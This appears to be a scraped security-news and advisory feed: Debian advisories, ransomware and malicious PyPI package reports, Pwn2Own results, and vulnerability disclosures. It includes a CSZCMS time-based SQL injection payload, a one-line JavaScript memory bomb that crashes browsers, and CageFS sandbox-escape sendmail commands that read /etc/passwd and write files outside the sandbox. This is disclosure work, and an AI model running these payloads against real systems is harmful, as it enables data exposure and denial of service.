Debian Linux Security Advisory 5609-1 - Several vulnerabilities were discovered in the Slurm Workload Manager, a cluster resource management and job scheduling system, which may result in privilege escalation, denial of service, bypass of message hash checks or opening files with an incorrect set of extended groups.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5609-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : slurm-wlmCVE ID         : CVE-2023-49933 CVE-2023-49936 CVE-2023-49937 CVE-2023-49938Debian Bug     : 1058720Several vulnerabilities were discovered in the Slurm Workload Manager, acluster resource management and job scheduling system, which may resultin privilege escalation, denial of service, bypass of message hashchecks or opening files with an incorrect set of extended groups.For the stable distribution (bookworm), these problems have been fixedin version 22.05.8-4+deb12u2.We recommend that you upgrade your slurm-wlm packages.For the detailed security status of slurm-wlm please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/slurm-wlmFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW2Sj9fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Q/0xAAiIX2hFquenx281NrzLcnOeIiuvf/+2eXs4/yVQ2P91S7kTzdbRc9n1dVAIwcvQHKHlQH7z/GHVLtjLDwjiAc34OcPzvLipiFgg6JRmKweOMWqyRns9DaIy4vRZRg7RvS4ltDOuqP9UXScTom4GAM3GCF6wrvxsyNwSvwayaJtqQw09OjWHJsKOPeaKJ6yIBfXUukreUQUctVH5P3HG58S1WD/8EqYrpgxC0mBYxs2Iv2FkEcyyiWY2mthuOqkmzfxf25xzQqlDg7kPMikHkqsHmKiFViAWOe44o0C7jED1JOh72BZk93ktrBWaA0lqj9w+CUhPoUinOL76qn+ija8URNIlnPExmY8/BlBDwEZ9pawTo/wv/IS34GzPDrpQQsBTRPpfO9FrJYPf87Ryfp7OpkWfa6LLqTckDp0PQc05/ABdKVtBw/OtfHZud9/qO+M80045IP4QIzDOiYkAQPEbnS3qlT6Io8RYu4C1tNiALBksMnuim3E63dKbRN4lBzCujKY0clKPLtafE6uNXv9gpQRdq2irDGo+IY8A2rfziWqrmdmiP5bxyQsZNpTuNSVGa5s+skId17xZDH/uQBi6UTT/0Qz8mceqa1Ufzu2bbpNHVdgGZ+YbAjAT7bOr5AY1JHqdCDXx6Pl2vQhIss20R3bxi8O0oZODPquGWgkwA==fdxl-----END PGP SIGNATURE-----

Debian Security Advisory 5609-1

Debian Linux Security Advisory 5608-1 - A heap-based buffer overflow during tile list parsing was discovered in the AV1 video codec parser for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5608-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 27, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-bad1.0CVE ID         : CVE-2024-0444A heap-based buffer overflow during tile list parsing was discovered inthe AV1 video codec parser for the GStreamer media framework, which mayresult in denial of service or potentially the execution of arbitrarycode if a malformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-3+deb11u4.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-4+deb12u5.We recommend that you upgrade your gst-plugins-bad1.0 packages.For the detailed security status of gst-plugins-bad1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-bad1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW1XvtfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T6lQ//U5/FcuUV+SLF3IYzbSGP3nxOl3njQNMQz12woGd8SJdFpsEgeyOFUqwE1u6xUjNbryI3N/U3zGxEH3P5gZdcxXbQX3dWqHr6IrBC1ciBwKZrtmcmy9ME2OZd1r2QYGNxGYr2d/E9IV6lvT6L2MPeKTbEmAUjCGgY/nsPi9P2ECwufD7KEHh+6IXn5WRPEFIWioOXWhiBn02x612VHJUvux5geBz6oLkl9sc2V9coHx19kywaC9W2JMttSlyBaw3s7l2lv25rwTYCie1YmAgjsvnyZu3ijGMwHp/Sa7RYUkTC09S/fzuZlFOADz5HRslsjvlk0SomPg5A0J6eDYVQUqE3fq3A2zRtkDbeGbScAmc4eyR1d4LE0FqTPOUxZoCR84fP542vOqLimvfdnkkaPSJwcQJRrwKx4r/hYFwOi4W1gwy90at7MQljzwrfExMcXu9B3WmzmwAcTsX9nrgyiXNKH3Lib0gT+93TbqdhUNHuj9zC885JfOwxTh+jRaas4dyx4Tjaz83pJaUzEEIgAHByfr5N1UltvIUmO7AX9C9iLLyVVmgb2Qz0ujdc1N8XSqcvB52psJe5o6oEx6UbAVTH48PGrCuYY2kfzKKHYUan6n8MILRw8Is4FaUz4BAUd6Fjgo+jG/oS32grK7aujTbqRCiDaTDLcT/vywZldQA==giTa-----END PGP SIGNATURE-----

Debian Security Advisory 5608-1

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as Faust.
Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script.
"The attackers utilized the Gitea service to store several files

Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as **Faust**.

Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script.

"The attackers utilized the Gitea service to store several files encoded in Base64, each carrying a malicious binary," security researcher Cara Lin said in a technical report published last week. "When these files are injected into a system's memory, they initiate a file encryption attack."

Faust is the latest addition to several ransomware variants from the Phobos family, including Eking, Eight, Elbie, Devos, and 8Base. It's worth noting that Faust was previously documented by Cisco Talos in November 2023.

The cybersecurity firm described the variant as active since 2022 and "does not target specific industries or regions."

The attack chain commences with an XLAM document that, when opened, downloads Base64-encoded data from Gitea in order to save a harmless XLSX file, while also stealthily retrieving an executable that masquerades as an updater for the AVG AntiVirus software ("AVG updater.exe").

The binary, for its part, functions as a downloader to fetch and launch another executable named "SmartScreen Defender Windows.exe" in order to kick-start its encryption process by employing a fileless attack to deploy the malicious shellcode.

"The Faust variant exhibits the ability to maintain persistence in an environment and creates multiple threads for efficient execution," Lin said.

The development comes as new ransomware families such as Albabat (aka White Bat), Kasseika, Kuiper, Mimus, and NONAME have gained traction, with the former a Rust-based malware that's distributed in the form of fraudulent software such as a fake Windows 10 digital activation tool and a cheat program for the Counter-Strike 2 game.

Trellix, which examined the Windows, Linux, and macOS versions of Kuiper earlier this month, attributed the Goland-based ransomware to a threat actor named RobinHood, who first advertised it on underground forums in September 2023.

"The concurrency focused nature of Golang benefits the threat actor here, avoiding race conditions and other common problems when dealing with multiple threads, which would have otherwise been a (near) certainty," security researcher Max Kersten said.

"Another factor that the Kuiper ransomware leverages, which is also a reason for Golang's increased popularity, are the language's cross-platform capabilities to create builds for a variety of platforms. This flexibility allows attackers to adapt their code with little effort, especially since the majority of the code base (i.e., encryption-related activity) is pure Golang and requires no rewriting for a different platform."

NONAME is also noteworthy for the fact that its data leak site imitates that of the LockBit group, raising the possibility that it could either be another LockBit or that it collects leaked databases shared by LockBit on the official leak portal, researcher Rakesh Krishnan pointed out.

The findings follow a report from French cybersecurity company Intrinsec that connected the nascent 3AM (also spelled ThreeAM) ransomware to the Royal/BlackSuit ransomware, which, in turn, emerged following the shutdown of the Conti cybercrime syndicate in May 2022.

The links stem from a "significant overlap" in tactics and communication channels between 3 AM ransomware and the "shared infrastructure of ex-Conti-Ryuk-TrickBot nexus."

That's not all. Ransomware actors have been observed once again using TeamViewer as an initial access vector to breach target environments and attempt to deploy encryptors based on the LockBit ransomware builder, which leaked in September 2022.

"Threat actors look for any available means of access to individual endpoints to wreak havoc and possibly extend their reach further into the infrastructure," cybersecurity firm Huntress said.

In recent weeks, LockBit 3.0 has also been distributed in the form of Microsoft Word files disguised as resumes targeting entities in South Korea, according to the AhnLab Security Intelligence Center (ASEC).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Albabat, Kasseika, Kuiper: New Ransomware Gangs Rise with Rust and Golang

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems.
The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."
"These

PyPI Repository / Malware

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called **WhiteSnake Stealer** on Windows systems.

The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."

"These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week.

"Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed."

While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog and Checkmarx disclosed last year.

"The Windows-specific payload was identified as a variant of the \[...\] WhiteSnake malware, which has an Anti-VM mechanism, communicates with a C&C server using the Tor protocol, and is capable of stealing information from the victim and executing commands," JFrog noted in April 2023.

It's also designed to capture data from web browsers, cryptocurrency wallets, and apps like WinSCP, CoreFTP, Windscribe, Filezilla, AzireVPN, Snowflake, Steam, Discord, Signal, and Telegram.

Checkmarx is tracking the threat actor behind the campaign under the moniker PYTA31, stating the end goal is to exfiltrate sensitive and particularly crypto wallet data from the target machines.

Some of the newly published rogue packages have also been observed incorporating clipper functionality to overwrite clipboard content with attacker-owned wallet addresses to carry out unauthorized transactions. A few others have been configured to steal data from browsers, applications, and crypto services.

Fortinet said the finding "demonstrates the ability of a single malware author to disseminate numerous info-stealing malware packages into the PyPI library over time, each featuring distinct payload intricacies."

The disclosure comes as ReversingLabs discovered two malicious packages on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

By Deeba Ahmed
FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI),…
This is a post from HackRead.com Read the original post: Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI), an open repository for Python\-developed software packages, to upload malware-infected packages. This exploitation of PyPI’s infrastructure poses significant risks to users.

FortiGuard Labs team recently identified a PyPI malware author, “WS,” uploading malicious packages to PyPI, estimating over 2000 potential victims. The identified packages, including nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111, show attack methodologies that resemble the attacks identified by Checkmarx in 2023.

These packages contain base64-encoded Python scripts, which are executed depending on the victim’s operating system. The packages deploy Whitesnake PE malware on Windows devices or a Python script to steal information from Linux devices.

What’s interesting in this scheme is that Python scripts are using a new method to transmit stolen data, using a range of IP addresses as the destination instead of a single fixed URL. This helps ensure successful data transmission even when one server fails.

Recently identified packages primarily target Windows users, whereas previous ones targeted both Linux and Windows users. The objective is to exfiltrate sensitive information from victims.

The Whitesnake PE payload is a Python-compiled executable created using the PyInstaller tool, displaying an incomplete script file ‘main.pyc’ and another file ‘addresses.py.’ This is rather suspicious. ‘Main.pyc’ is clandestine code that copies itself to the Windows startup folder for autorun, probes logical drives, and monitors the count of running instances.

It also retrieves clipboard contents and compares them against predefined cryptocurrency address patterns, prompting it to overwrite the clipboard with corresponding addresses from ‘addresses.py’, potentially deceiving victims into directing cryptocurrency transactions to an unexpected destination.

The payload, an encrypted.NET executable launches an invisible window right after its installation and adds itself to Windows Defender‘s exclusion list. It then creates a scheduled task to run every hour on the compromised device. The task connects a malicious IP to a client using “socket.io” and collects sensitive user data, including IP address and host credentials.

The payload captures wallet and browser data and sends it to a suspicious IP address via a remote server as a.zip file with multiple encryption layers, which the attacker extracts and exfiltrates. Debugging revealed strings that indicated information stolen from a wide range of devices, such as cryptocurrency services, applications, and browsers.

Timeline of the malicious PyPI packages published by “WS” (Screenshot: Fortinet Labs)

The research reveals how easily a single malware author can distribute multiple info-stealing packages into the PyPI library, highlighting the need for vigilance when using open-source packages.

“Information-stealing malware is an increasingly pertinent and pressing subject. Safeguarding against such persistent adversaries demands a strategic and forward-thinking approach to fortify your defences,” FortiGuard Labs researchers concluded.

****_RELATED ARTICLES_****

1.  **Luna Grabber Malware Hits Roblox Devs Through npm Packages**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **GitHub Abused to Spread Malicious Packages on PyPI in Image Files**
4.  **NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package**
5.  **FortiGuard Labs Uncovers Series of Malicious NPM Packages Stealing Data**

Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

By Deeba Ahmed
Vendors have 90 days to release security patches before Trend Micro publicly discloses it.
This is a post from HackRead.com Read the original post: Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

Pwn2Own Automotive 2024 took place in Tokyo, Japan, from January 24 to 26.

Pwn2Own Automotive 2024, a three-day contest organized by Trend Micro’s Zero Day Initiative, saw competitors earn $1,323,750 for hacking Tesla twice and discovering 49 zero-day bugs in EV systems.

Synacktiv Team won the contest, earning $450,000 in cash for hacking a Tesla car twice, gaining root permissions, and demonstrating a sandbox escape in the Tesla infotainment system. They also demonstrated two-bug chains against Ubiquiti Connect and JuiceBox 40 Smart EV Stations. Second on the list was fuzzware.io for received $177,500. In third place were Midnight Blue/PHP Hooligans with $80,000 in rewards.

Participants earned over $700,000 on the first day, including $60,000 for EV charger hacks and $40,000 for infotainment system and Tesla modem hacks. The second day saw the Automotive Grade Linux exploit earning the biggest reward of $35,000, while EV charger exploits earned teams $30,000. On the third day, researchers received $60,000 for an Emporia EV charger exploit and $30,000 each for other exploits, resulting in payouts ranging from $20,000 to $26,000.

Here, are the prominent happenings and results from all three days of the contest.

On the first day, researchers discovered vulnerabilities in Tesla’s modem, Sony’s infotainment systems, and Alpine’s car audio players, collectively earning $722,500 in awards for identifying three bug collisions and 24 zero-day exploits.

The NCC Group EDG team won $70,000 for exploiting zero-day bugs to hack Pioneer DMH-WT7600NEX and Phoenix Contact CHARX SEC-3100 EV chargers. Sina Kheirkhah, Tobias Scharnowski, and Felix Buchmann attacked ChargePoint Home Flex and Sony XAV-AX5500, earning $60,000 and $40,000, respectively.

Synacktiv Team successfully exploited Tesla Modem and JuiceBox 40 Smart EV charging stations, while the PCAutomotive Team exploited Alpine Halo9 iLX-F509.

On Day 2, Team Tortuga successfully exploited a known bug in a 2-bug chain against the ChargePoint Home Flex, earning $5,000 and 3 Master of Pwn Points. The Midnight Blue / PHP Hooligans team also used a known bug in a 3-bug chain to exploit the Phoenix Contact CHARX SEC-3100, earning $30,000 and 6 Master of Pwn Points.

PCAutomotive couldn’t exploit the JuiceBox 40 Smart EV Charging Station whereas Katsuhiko Sato successfully attacked the Sony XAV-AX5500, earning $10,000 and 2 Master of Pwn Points.

Computest Sector 7 successfully targeted the JuiceBox 40 Smart EV Charging Station for a known bug, earning $15,000 and 3 Master of Pwn Points. Sina Kheirkhah failed to exploit the Autel MaxiCharger AC Wallbox Commercial, while Synacktiv and NCC Group EDG successfully exploited the Tesla Infotainment System and Alpine Halo9 iLX-F509, using a 2-bug chain, earning $100,000 and $20,000, respectively.

Synacktiv earned $35,000 and 5 Master of Pwn Points using a 3-bug chain, while Le Tran Hai Tung earned $20,000 and 4 Master of Pwn Points using a 2-bug chain. Sina Kheirkhah and Alex Olson failed to get their exploits working, while fuzzware.io earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow. RET2 Systems also earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow.

Day 3 saw Computest Sector 7 exploiting the ChargePoint Home Flex and earning $30,000 and 6 Master of Pwn Points using a 2-bug chain. Synacktiv successfully exploited the Sony XAV-AX5500, earning $20,000 and 4 Master of Pwn Points. Katsuhiko Sato failed to exploit the Pioneer DMH-WT7600NEX.

Sina Kheirkhah attacked the Ubiquiti Connect EV, earning $30,000 and 6 Master of Pwn Points. fuzzware.io exploited the Phoenix Contact CHARX SEC-3100, earning $22,500 and 4.5 Master of Pwn Points.

Nettitude’s Connor Ford exploited the JuiceBox 40 Smart EV Charging Station, using a stack-based buffer overflow, earning $30,000 and 6 Master of Pwn Points. Team Cluck exploited the Phoenix Contact CHARX SEC-3100, earning $26,250 and 5.25 Master of Pwn Points.

Vendors have 90 days to release security patches before Trend Micro publicly discloses it.

****_RELATED ARTICLES_****

1.  6 of the Best Crypto Bug Bounty Programs
2.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
3.  Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu Pwned

Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

CloudLinux CageFS versions 7.0.8-2 and below insufficiently restrict file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files of certain file formats outside the CageFS environment.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Insufficiently Restricted Proxy Command #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths  
supplied to the `sendmail` proxy command. This allows local users to read  
and write arbitrary files of certain file formats outside the CageFS  
environment.

* **Identifier**            : SBA-ADV-20200707-02  
* **Type of Vulnerability** : External Control of File Name or Path  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.0.8-2  
* **Fixed in Version**      : 7.1.1-1  
* **CVE ID**                : CVE-2020-36772  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L  
* **CVSS Base Score**       : 6.6 (Medium)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

A CageFS-restricted local user can read and write arbitrary files of certain  
file formats outside the CageFS environment by exploiting the vulnerability  
documented in this advisory.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS environment.

CageFS allows in its default configuration to execute `sendmail` as a proxy  
command outside the CageFS environment. This default configuration is  
designed to allow local programs sending emails by invoking `sendmail`.  
Due to the insufficient validation of sendmail's arguments an attacker can  
invoke other sendmail functionality as well. While CageFS applies some  
restrictions to the allowed arguments it does not restrict or validate the  
`-bi` and `-oA` arguments.

Therefore, an attacker can have `sendmail` access arbitrary files which will  
be interpreted as alias database files by enabling the `newalias` mode of  
`sendmail` with `-bi` and specifying a file located outside the CageFS  
environment with `-oA`.

On systems using the Postfix to Sendmail compatibility interface, a great  
number of different alias database types can be used to craft exploits.  
The compatibility interface internally calls `postalias` and besides the  
`-oA` argument already being dangerous by itself, it also suffers from an  
argument injection issue, which allows injection of additional Postfix  
specific arguments for `postalias`. However, this is not a security issue  
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a  
security policy on command-line arguments. Instead, it relies on the  
UNIX/Linux system to enforce access policies based on the effective user and  
group IDs of the process. If a security policy should be enforced, the  
calling process must sanitize the command-line arguments before they are  
given to `sendmail`. This includes but is not limited to sanity checks on  
pathnames, and if applicable sanity checks on file contents in a way that  
is not vulnerable to time-of-check to time-of-use race attacks, and  
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially  
follow the structure `key <whitespace> value` via the lookup table type  
`texthash`:

```sh  
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'  
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line  
[...]  
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line  
sssd:x:496:493:User:    for sssd:/:/sbin/nologin  
dbus:x:81:81:System:    message bus:/:/sbin/nologin  
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin  
tss:x:59:59:Account:    used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin  
systemd-resolve:x:193:193:systemd:      Resolver:/:/sbin/nologin  
rngd:x:494:491:Random:  Number Generator Daemon:/var/lib/rngd:/sbin/nologin  
sshd:x:74:74:Privilege-separated:       SSH:/var/empty/sshd:/sbin/nologin  
systemd-coredump:x:499:497:systemd:     Core Dumper:/:/sbin/nologin  
nobody:x:65534:65534:Kernel:    Overflow User:/:/sbin/nologin  
ftp:x:14:50:FTP:        User:/var/ftp:/sbin/nologin  
unbound:x:498:496:Unbound:      DNS resolver:/etc/unbound:/sbin/nologin  
nrpe:x:492:486:NRPE:    user for the NRPE service:/var/run/nrpe:/sbin/nologin  
```

The attacker can also use other lookup table types which might disclose  
sensitive information. For example, `unix` allows the query of specific  
users regardless of the format:

```sh  
$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'  
ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin  
```

An attacker can also write specific file formats outside the CageFS  
environment. For example, with the `hash` lookup table type:

```sh  
$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'  
$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'  
@:      @  
YP_LAST_MODIFIED:       1594138203  
YP_MASTER_NAME: localhost  
sba:    was_here  
```

## Recommended Countermeasures ##

We recommend to restrict the `sendmail` command to only strictly required  
parameters using an allow list approach. At least the following parameters  
are known to cause dangerous behavior:

* `-oA`: Allows specification of multiple paths and additional arguments.  
  It is important to consider that it is directly followed by the pathname  
  without a separator, i.e., `-oA/etc/passwd`.  
* `-bi`: Enables the `newalias` mode of `sendmail`.  
* `-I`: Enables the `newalias` mode of `sendmail`.  
* `-v`: If the parameter is added at least two times, i.e., `-vv`,  
  `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the  
  Postfix configuration in some cases.

We did not fully analyze other parameters of `sendmail`, therefore, it is  
possible that `sendmail` as proxy command is also prone to other attacks.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-08-06`: vendor released version 7.1.1-1 to testing  
* `2020-09-03`: vendor released version 7.1.1-1 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36772  
* `2024-01-25`: public disclosure

## References ##

* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1>  
* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3  
